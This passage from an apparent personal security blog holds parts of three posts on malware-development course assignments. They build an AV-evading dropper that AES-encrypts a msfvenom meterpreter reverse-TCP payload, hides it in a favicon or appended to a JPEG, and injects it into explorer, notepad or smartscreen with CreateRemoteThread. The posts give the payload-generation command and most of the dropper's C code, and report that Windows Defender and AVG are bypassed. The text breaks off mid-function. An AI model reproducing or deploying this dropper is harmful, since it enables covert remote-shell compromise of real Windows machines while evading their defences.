<p>As in the previous post we tested the dropper on different process: <code class="language-plaintext highlighter-rouge">explorer.exe</code>, <code class="language-plaintext highlighter-rouge">notepad.exe</code> and <code class="language-plaintext highlighter-rouge">smartscreen.exe</code> but in this case the injection doesn’t trigger Windows Defender nor AVG Free “only” on <code class="language-plaintext highlighter-rouge">explorer.exe</code> and <code class="language-plaintext highlighter-rouge">smartscreen.exe</code>, AVG scan the dropper and let it execute the reverse shell payload maintaining the shell active. So, also in this case, we are following the TOON rule (Two is One and One is None) also in this case.</p>
<p><img src="/assets/images/AV_evasion/AVG_fs_bypass.gif" alt="" /><br /></p>
<p>and <a href="https://github.com/bolonobolo/av_evasion/tree/master/PE_Injection/Sharing%20is%20scaring/implant.cpp">here</a> you can find the dropper code. <br />
We hope you enjoied the ride on <code class="language-plaintext highlighter-rouge">RedTeam Operator Malware Development Essentials</code> walkthrough assignments.<br />
Stay tuned for the <code class="language-plaintext highlighter-rouge">Intermediate</code> level posts :)</p>
<h2 id="references">References</h2>
<p>Malware Dev Essentials Course</p>
<ul>
<li><a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a></li>
<li><a href="https
://twitter.com/Sektor7Net">reenz0h</a> <br /></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}AV Evasion - The payload is behind kitties2020-09-22T00:00:00+00:002020-09-22T00:00:00+00:00https://blackcloud.me/the-payload-is-behind-kitties<p><img src="/assets/images/AV_evasion/kittens.jpg" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>Hello and welcome back to the 2nd assignment of the well done course on Malware Development by <a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a>, in the previous <a href="https://blackcloud.me/av-evasion-1/">blog post</a> we saw PE injection using a payload saved as a favicon.ico file, with all the functions and payload encrypted with AES. The next assignment is to hide the payload inside an image and implement the dropper with the capacity of extraction of the payload and injecting it in the PE process target.</p>
<h2 id="the-assignment">The Assignment</h2>
<p>Let’s start taking our last dropper and check what we have and what we must change.<br />
The most of the code is working pretty well as we saw, but the payload extraction has to be changed because now reenz0h asked to hide the payload inside an image and extract it before injecting in the victim process, so take a look closer to the payload memory loading and analyze what we have to change.</p>
<h2 id="the-payload">The Payload</h2>
<p>First of all we need to choose how hide our payload behind an image and most important how we want to extract it before using it. <br />
The hint in the assignemt page sais we can use file concatenation. So we choosed this way to work (a big thank you to reenz0h for the help):</p>
<ul>
<li>Take a kitties image from internet (who doesn’t love kitties? :))</li>
<li>Create the payload with msfvenom
<ul>
<li>in this case I choosed a simple reverse tcp windows x64 shell</li>
</ul>
</li>
<li>Encrypt the payload with AES</li>
<li>Append the encrypted payload at the end of the image</li>
<li>Append the original lenght of image as last bytes in the image</li>
</ul>
<p>Once we downloaded the kitties image from internet we can check last 11 rows of the hexadecimal values of the image with <code class="language-plaintext highlighter-rouge">xxd</code></p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>xxd <span class="nt">-g1</span> U.jpg | <span class="nb">tail</span> <span class="nt">-11</span>
00330990: 81 f1 c0 8a b8 e5 e3 18 00 0e 13 62 25 25 3c 4d ...........b%%<M
003309a0: f6 02 dc e7 98 <span class="nb">fc </span>6f f6 62 59 5f c2 31 93 3c e2 ......o.bY_.1.<<span class="nb">.</span>
003309b0: 85 80 12 07 53 ba 85 c9 20 fe 97 e3 7c 0d c0 03 ....S... ...|...
003309c0: 96 d0 65 4f 89 a7 aa 78 21 2a 0a 58 29 2a b1 1a ..eO...x!<span class="k">*</span>.X<span class="o">)</span><span class="k">*</span>..
003309d0: 6f 73 6c 08 53 2d e1 95 45 55 3c d3 4a 9f 09 0b osl.S-..EU<.J...
003309e0: 1a 46 a3 cc 08 bf 37 bb 17 14 98 c8 38 9e eb 48 .F....7.....8..H
003309f0: 6a 94 92 4e a5 ac 8e 53 74 82 6d f6 <span class="nb">fc </span>7c b0 51 j..N...St.m..|.Q
00330a00: 44 77 c8 1a 70 d2 57 c8 90 db 7a b4 bc 06 d6 e6 Dw..p.W...z.....
00330a10: 4a f5 95 03 ea ed 6e 1f 8e 08 a9 8f 2f 24 b6 f3 J.....n...../<span class="nv">$.</span><span class="nb">.</span>
00330a20: 7a 65 63 ae a5 cb ea 59 17 d1 60 b4 f3 a9 44 6e zec....Y..<span class="sb">`</span>...Dn
00330a30: 3a e2 56 ce 6c e3 76 41 16 d0 cf ff d9 :.V.l.vA.....
</code></pre></div></div>
<p>Now after the encryption of the payload we can use a copy of the original image (is usefull to work on a copy just in case something doesn’t work as exepected, you don’t have to download the image everytime) and append the encrypted paylaod to the image with the <code class="language-plaintext highlighter-rouge">cat</code> command</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">cat </span>payload_enc <span class="o">>></span> kittens.jpg
</code></pre></div></div>
<p>Now check the tail of the image compared with the encrypted payload to see if everithing is loaded correctly
<img src="/assets/images/AV_evasion/hex_compare.png" alt="" />
As we can see after the hex values <code class="language-plaintext highlighter-rouge">ff d9</code> (that’s in the end of every jpg file) we have our encrypted payload. <br />
After that we have to append the value of the size of the original image, in this case 3344957 bytes</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">echo</span> <span class="s2">"3344957"</span> <span class="o">>></span> kittens.jpg
</code></pre></div></div>
<p>Check again the last hex values of the manipulated jpg
<img src="/assets/images/AV_evasion/hex_compare2.png" alt="" /><br />
Great! our devil jpg is ready. Now we have to modify our dropper to extract the payload from the image in our victim machine</p>
<h2 id="the-dropper">The Dropper</h2>
<p>Let’s change the name of the payload as a recource by the file <code class="language-plaintext highlighter-rouge">resources.rc</code> to <code class="language-plaintext highlighter-rouge">kittens.jpg</code></p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include "resources.h"
</span>
<span class="n">IMAGE</span> <span class="n">RCDATA</span> <span class="n">kittens</span><span class="p">.</span><span class="n">jpg</span>
</code></pre></div></div>
<p>The dropper has a section where the payload is loaded as a resource with the <code class="language-plaintext highlighter-rouge">FindResourceA</code> and <code class="language-plaintext highlighter-rouge">LoadResource</code> functions, its lenght is calculated with <code class="language-plaintext highlighter-rouge">SizeofResource</code> then it is loaded in memory with the <code class="language-plaintext highlighter-rouge">VirtualAlloc</code> function</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">...</span>
<span class="c1">// Extract payload from resources section</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">pFindResourceA</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">MAKEINTRESOURCE</span><span class="p">(</span><span class="n">FAVICON_ICO</span><span class="p">),</span> <span class="n">RT_RCDATA</span><span class="p">);</span>
<span class="n">resHandle</span> <span class="o">=</span> <span class="n">pLoadResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">pLockResource</span><span class="p">(</span><span class="n">resHandle</span><span class="p">);</span>
<span class="n">payload_len</span> <span class="o">=</span> <span class="n">pSizeofResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="c1">// Allocate some memory buffer for payload</span>
<span class="n">exec_mem</span> <span class="o">=</span> <span class="n">pVirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">);</span>
<span class="p">...</span>
</code></pre></div></div>
<p>In the code trunk below the Windows functions are called as pointers because of AES encryption as saw in the previous post, this techniques works very well as an AV evasion technique so we can reuse it. Now we have to change this section like this</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Load resources section</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">pFindResourceA</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">MAKEINTRESOURCE</span><span class="p">(</span><span class="n">IMAGE</span><span class="p">),</span> <span class="n">RT_RCDATA</span><span class="p">);</span>
<span class="n">resHandle</span> <span class="o">=</span> <span class="n">pLoadResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="c1">// Extract payload from the image</span>
<span class="n">image</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">pLockResource</span><span class="p">(</span><span class="n">resHandle</span><span class="p">);</span> <span class="c1">// lock the resource and point to the first char of the jpg</span>
<span class="n">image_len</span> <span class="o">=</span> <span class="n">SizeofResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span> <span class="c1">// get the size of the jpg + payload + last 7 bytes </span>
<span class="n">end</span> <span class="o">=</span> <span class="n">image</span> <span class="o">+</span> <span class="n">image_len</span> <span class="o">-</span> <span class="mi">7</span><span class="p">;</span> <span class="c1">// jump to the end of the jpg and read the last 7 bytes that are the original size of the jpg without payload</span>
<span class="n">size</span> <span class="o">=</span> <span class="n">atoi</span><span class="p">(</span><span class="n">end</span><span class="p">);</span> <span class="c1">// cast from char to int, now size is the original size of the jpg</span>
<span class="n">offset</span> <span class="o">=</span> <span class="n">image</span> <span class="o">+</span> <span class="n">size</span><span class="p">;</span> <span class="c1">// offset points to the first char of the p0</span>
<span class="n">payload_len</span> <span class="o">=</span> <span class="n">image_len</span> <span class="o">-</span> <span class="n">size</span> <span class="o">-</span> <span class="mi">7</span><span class="p">;</span> <span class="c1">// calculate the payload size</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">payload</span><span class="p">,</span> <span class="n">offset</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span> <span class="c1">// copy in another memory area the effective payload </span>
<span class="c1">// Allocate some memory buffer for payload</span>
<span class="n">exec_mem</span> <span class="o">=</span> <span class="n">pVirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">);</span>
</code></pre></div></div>
<p>Long story short, instead of charging the payload from a separated file we need to:</p>
<ul>
<li>get the size of the devil image,</li>
<li>jump at the end of the devil image and read the last 7 bytes that are the size of the orginal image</li>
<li>now we can calculate the offset from the original image and the devil image, this difference is the payload</li>
<li>now we need to calculate the payload lenght</li>
<li>use memcpy to load the payload in memory and use it as a resource</li>
</ul>
<h2 id="tests">Tests</h2>
<p>As in the previous post we tested the dropper on different process: <code class="language-plaintext highlighter-rouge">explorer.exe</code>, <code class="language-plaintext highlighter-rouge">notepad.exe</code> and <code class="language-plaintext highlighter-rouge">smartscreen.exe</code> but in this case all the 3 processes inject doesn’t trigger Windows Defender nor AVG Free, however the <code class="language-plaintext highlighter-rouge">explorer.exe</code> injecton causes a reload of the process in the case you exit the shell on the attacking machine and this is very loud. On the other hand nothing appens when we try to inject the <code class="language-plaintext highlighter-rouge">notepad.exe</code>, AVG scan the dropper and let it execute the reverse shell payload maintaining the shell active also when we close Notepad and the <code class="language-plaintext highlighter-rouge">notepad.exe</code> process is destroyed, same story if we try to inject the <code class="language-plaintext highlighter-rouge">smartscreen.exe</code> process, another reverse shell session is opened without any alarm from AVG.
So we are following the TOON rule (Two is One and One is None) also in this case.</p>
<p><img src="/assets/images/AV_evasion/AVG_image_bypass.gif" alt="" /><br /></p>
<p>and <a href="https://github.com/bolonobolo/av_evasion/tree/master/PE_Injection/Behind%20image%20Dropper/implant.cpp">here</a> you can find the dropper code. <br />
In the <a href="https://blackcloud.me/sharing-is-caring/">next post</a> we’ll try to complete another point of the assignment <code class="language-plaintext highlighter-rouge">Build a dropper, which hosts its payload in a separate AES-encrypted file</code>.</p>
<h2 id="references">References</h2>
<p>Malware Dev Essentials Course</p>
<ul>
<li><a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a></li>
<li><a href="https://twitter.com/Sektor7Net">reenz0h</a> <br /></li>
</ul>{"name"=>nil, "avatar"=>"/assets/images/blackcloud3.png", "bio"=>"Made to broke things", "location"=>"noplace", "email"=>nil, "links"=>[{"label"=>"Email", "icon"=>"fas fa-fw fa-envelope-square", "url"=>"mailto:bolo@autistici.org"}, {"label"=>"Website", "icon"=>"fas fa-fw fa-link"}, {"label"=>"Twitter", "icon"=>"fab fa-fw fa-twitter-square", "url"=>"https://twitter.com/bolonobolo"}, {"label"=>"Facebook", "icon"=>"fab fa-fw fa-facebook-square"}, {"label"=>"GitHub", "icon"=>"fab fa-fw fa-github", "url"=>"https://github.com/bolonobolo"}, {"label"=>"Instagram", "icon"=>"fab fa-fw fa-instagram"}, {"label"=>"Hackthebox", "url"=>"https://www.hackthebox.eu/profile/8822", "icon"=>"fas fa-fw fa-link"}]}AV Evasion - a PE injection method2020-06-22T00:00:00+00:002020-06-22T00:00:00+00:00https://blackcloud.me/av-evasion-1<p><img src="/assets/images/AV_evasion/defeating_av.jpg" alt="" /><br /></p>
<h2 id="introduction">Introduction</h2>
<p>Hi my fellows, I recently purchased a well done course on Malware Development by <a href="https://institute.sektor7.net/red-team-operator-malware-development-essentials">Sektor7</a>, I started my journey on the fantastic world of Malwares, Code Obfuscation, Droppers and AV Evasion.
I would share with you what I learned on this beautiful course posting my progress on the final assignment, <a href="https://twitter.com/Sektor7Net">reenz0h</a> prepared for us.</p>
<h2 id="the-course">The course</h2>
<p>The learning process addresses some foundamental theoretical topics but it is based for the most on a practical approach that is what i like. It comes with a dedicated Windows 10 VM stuffed with all the tools you need for your purpouses and some templates used for the topics course and for your experiments.
The course starts explaining the Droppers, what they are and how they works, next it moves on some well described obfuscation techniques and the PE backdooring process, last but not least the Injection process that took me a little bit effort to understand but it fascinated me a lot. I think that the Injection process is one of the topics you have to deep understand if you want to became a good Malware developer and/or a good Malware analyst.
In the last section reenz0h mixed all the techniques explained in the course to show you how a dropper could be used to obtain the execution of your payload silently like a ninja.
This is an “Essential” course so you have to go into some topics yourself but i like this type of learning approach and reenz0h is alwaays there if you need help.</p>
<h2 id="the-assignment">The Assignment</h2>
<p>Let’s start explaining that when you’ll finish the course you’ll have some dropper templates “ready to use” to inject and execute your payload. The injection techniques used in this course are the most known PE injection and DLL injection:
<img src="/assets/images/AV_evasion/process-injection-techniques-blogs-pe-injection.gif" alt="" /><br />
<br />
<img src="/assets/images/AV_evasion/process-injection-techniques-blogs-dll-injection.gif" alt="" /><br />
<br />
Once you finished the course, reenz0h ask you to complete an assignment that starts with turn the custom dropper you wrote during the course into a stealthy version.
How could you do this achievement? reenz0h gives you some suggestion like encrypting all strings and obfuscate all function calls and payload usign AES encrypting algorithm. So let’s start.</p>
<h2 id="the-dropper">The Dropper</h2>
<p>The dropper has 3 basic function inside that are needed to make things working and to make the dropper more stealthy. The first funtion is the one needed to decrypt all the strings, function and payload encrypted with AES, we can call it AESDecrypt()</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">AESDecrypt</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span> <span class="n">payload</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">payload_len</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">key</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">keylen</span><span class="p">)</span> <span class="p">{</span>
<span class="n">HCRYPTPROV</span> <span class="n">hProv</span><span class="p">;</span>
<span class="n">HCRYPTHASH</span> <span class="n">hHash</span><span class="p">;</span>
<span class="n">HCRYPTKEY</span> <span class="n">hKey</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CryptAcquireContextW</span><span class="p">(</span><span class="o">&</span><span class="n">hProv</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">PROV_RSA_AES</span><span class="p">,</span> <span class="n">CRYPT_VERIFYCONTEXT</span><span class="p">)){</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CryptCreateHash</span><span class="p">(</span><span class="n">hProv</span><span class="p">,</span> <span class="n">CALG_SHA_256</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&</span><span class="n">hHash</span><span class="p">)){</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CryptHashData</span><span class="p">(</span><span class="n">hHash</span><span class="p">,</span> <span class="p">(</span><span class="n">BYTE</span><span class="o">*</span><span class="p">)</span><span class="n">key</span><span class="p">,</span> <span class="p">(</span><span class="n">DWORD</span><span class="p">)</span><span class="n">keylen</span><span class="p">,</span> <span class="mi">0</span><span class="p">)){</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CryptDeriveKey</span><span class="p">(</span><span class="n">hProv</span><span class="p">,</span> <span class="n">CALG_AES_256</span><span class="p">,</span> <span class="n">hHash</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span><span class="o">&</span><span class="n">hKey</span><span class="p">)){</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">CryptDecrypt</span><span class="p">(</span><span class="n">hKey</span><span class="p">,</span> <span class="p">(</span><span class="n">HCRYPTHASH</span><span class="p">)</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="o">&</span><span class="n">payload_len</span><span class="p">)){</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">CryptReleaseContext</span><span class="p">(</span><span class="n">hProv</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="n">CryptDestroyHash</span><span class="p">(</span><span class="n">hHash</span><span class="p">);</span>
<span class="n">CryptDestroyKey</span><span class="p">(</span><span class="n">hKey</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The second function in preparatory to find the PE process to inject, the payload first needs to target a process for injection.
This is usually done by searching through processes by calling a trio of Application Program Interfaces (APIs): CreateToolhelp32Snapshot, Process32First, and Process32Next. CreateToolhelp32Snapshot is an API used for enumerating heap or module states of a specified process or all processes, and it returns a snapshot. Process32First retrieves information about the first process in the snapshot, and then Process32Next is used in a loop to iterate through them. After finding the target process, the function returns its pid.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">Find</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">procname</span><span class="p">)</span> <span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">hProcSnap</span><span class="p">;</span>
<span class="n">PROCESSENTRY32</span> <span class="n">pe32</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">hProcSnap</span> <span class="o">=</span> <span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">INVALID_HANDLE_VALUE</span> <span class="o">==</span> <span class="n">hProcSnap</span><span class="p">)</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">pe32</span><span class="p">.</span><span class="n">dwSize</span> <span class="o">=</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">Process32First</span><span class="p">(</span><span class="n">hProcSnap</span><span class="p">,</span> <span class="o">&</span><span class="n">pe32</span><span class="p">))</span> <span class="p">{</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcSnap</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">while</span> <span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">hProcSnap</span><span class="p">,</span> <span class="o">&</span><span class="n">pe32</span><span class="p">))</span> <span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lstrcmpiA</span><span class="p">(</span><span class="n">procname</span><span class="p">,</span> <span class="n">pe32</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
<span class="n">pid</span> <span class="o">=</span> <span class="n">pe32</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcSnap</span><span class="p">);</span>
<span class="k">return</span> <span class="n">pid</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>The third function is made to inject the payload in the PE process indentified by the pid. After finding the target process, the malware gets the handle of the target process by calling OpenProcess.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">Inject</span><span class="p">(</span><span class="n">HANDLE</span> <span class="n">hProc</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">payload</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">payload_len</span><span class="p">)</span> <span class="p">{</span>
<span class="n">LPVOID</span> <span class="n">pRemoteCode</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">HANDLE</span> <span class="n">hThread</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">RemoteCode</span> <span class="o">=</span> <span class="n">VirtualAllocEx</span><span class="p">(</span><span class="n">hProc</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READ</span><span class="p">);</span>
<span class="n">WriteProcessMemory</span><span class="p">(</span><span class="n">hProc</span><span class="p">,</span> <span class="n">RemoteCode</span><span class="p">,</span> <span class="p">(</span><span class="n">PVOID</span><span class="p">)</span><span class="n">payload</span><span class="p">,</span> <span class="p">(</span><span class="n">SIZE_T</span><span class="p">)</span><span class="n">payload_len</span><span class="p">,</span> <span class="p">(</span><span class="n">SIZE_T</span> <span class="o">*</span><span class="p">)</span><span class="nb">NULL</span><span class="p">);</span>
<span class="n">hThread</span> <span class="o">=</span> <span class="n">CreateRemoteThread</span><span class="p">(</span><span class="n">hProc</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">RemoteCode</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">hThread</span> <span class="o">!=</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
<span class="n">WaitForSingleObject</span><span class="p">(</span><span class="n">hThread</span><span class="p">,</span> <span class="mi">500</span><span class="p">);</span>
<span class="n">CloseHandle</span><span class="p">(</span><span class="n">hThread</span><span class="p">);</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Now, the last bit effort to have everything working, so first generate the payload. I choosed to use the most knowed payload for ATP and AV agents: the meterpreter reverse TCP payload:
<code class="language-plaintext highlighter-rouge">msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64.bin LHOST=<your ip> LPORT=<your port> EXITFUNC=thread</code>
second we need to encrypt it with an AES script (you can find a lot of scripts for this purpouse on the Internet) and third we define the main function and the payload storage, we encrypted the payload in a file called <code class="language-plaintext highlighter-rouge">favicon.ico</code> that is included in the <code class="language-plaintext highlighter-rouge">resources.h</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define FAVICON_ICO 512
</code></pre></div></div>
<p>the main function could be defined by this steps:</p>
<ol>
<li>extract the payload from the resources</li>
<li>allocate some memory space for the payload with the VirtualAlloc API</li>
<li>copy the payload to the new memory space just created</li>
<li>decrypt the payload</li>
<li>fihd the pid process you want to inject</li>
<li>open the process with the OpenProcess API and the pid</li>
<li>inject and execute the payload</li>
<li>close the handle</li>
</ol>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <wincrypt.h>
#include <tlhelp32.h>
#include "resources.h"
#pragma comment (lib, "crypt32.lib")
#pragma comment (lib, "advapi32")
#include <psapi.h>
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
<span class="kt">void</span> <span class="o">*</span> <span class="n">exec_mem</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="n">rv</span><span class="p">;</span>
<span class="n">HANDLE</span> <span class="n">th</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">oldprotect</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">HGLOBAL</span> <span class="n">resHandle</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="n">HRSRC</span> <span class="n">res</span><span class="p">;</span>
<span class="kt">int</span> <span class="n">pid</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">HANDLE</span> <span class="n">hProc</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span> <span class="n">payload</span><span class="p">;</span>
<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">payload_len</span><span class="p">;</span>
<span class="c1">// Extract payload from resources section</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">FindResourceA</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">MAKEINTRESOURCE</span><span class="p">(</span><span class="n">FAVICON_ICO</span><span class="p">),</span> <span class="n">RT_RCDATA</span><span class="p">);</span>
<span class="n">resHandle</span> <span class="o">=</span> <span class="n">LoadResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">LockResource</span><span class="p">(</span><span class="n">resHandle</span><span class="p">);</span>
<span class="n">payload_len</span> <span class="o">=</span> <span class="n">SizeofResource</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="n">res</span><span class="p">);</span>
<span class="c1">// Allocate some memory buffer for payload</span>
<span class="n">exec_mem</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_READWRITE</span><span class="p">);</span>
<span class="c1">// Copy payload to new memory buffer</span>
<span class="n">RtlMoveMemory</span><span class="p">(</span><span class="n">exec_mem</span><span class="p">,</span> <span class="n">payload</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">);</span>
<span class="c1">// Decrypt payload</span>
<span class="n">AESDecrypt</span><span class="p">((</span><span class="kt">char</span> <span class="o">*</span><span class="p">)</span> <span class="n">exec_mem</span><span class="p">,</span> <span class="n">payload_len</span><span class="p">,</span> <span class="n">payload_key</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">payload_key</span><span class="p">));</span>
<span class="c1">// Injection process starts here</span>
<span class="n">pid</span> <span class="o">=</span> <span class="n">Find</span><span class="p">(</span><span class="s">"here you have to insert the name of the process you want to inject"</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">pid</span><span class="p">)</span> <span class="p">{</span>
<span class="c1">// try to open target process</span>
